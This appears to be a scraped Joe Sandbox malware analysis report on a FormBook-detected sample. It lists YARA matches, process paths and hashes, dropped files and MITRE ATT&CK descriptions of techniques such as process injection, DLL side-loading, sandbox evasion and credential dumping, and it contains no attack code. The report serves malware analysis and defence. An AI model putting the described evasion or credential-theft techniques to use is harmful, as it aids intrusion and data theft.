Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Has exited:	false

Analysis Process: usFxdnRPYjnb.exePID: 2492, Parent PID: 8040

General

Target ID:	19
Start time:	02:05:33
Start date:	19/05/2024
Path:	C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe"
Imagebase:	0xfa0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: firefox.exePID: 7468, Parent PID: 8040

General

Target ID:	20
Start time:	02:06:11
Start date:	19/05/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Disassembly

⊘No disassembly

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FGGx944Qu7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FGGx944Qu7.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TBsjWljiCpR.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\20291vC

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1k4wtsks.qys.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1rfx4p55.jzt.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2odq22e3.wb2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uya4cokv.3zx.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wftn1kob.rrm.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wms5kunf.vwh.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ys2tmhij.gni.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zuw0b1st.zey.ps1

Windows Analysis Report
FGGx944Qu7.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre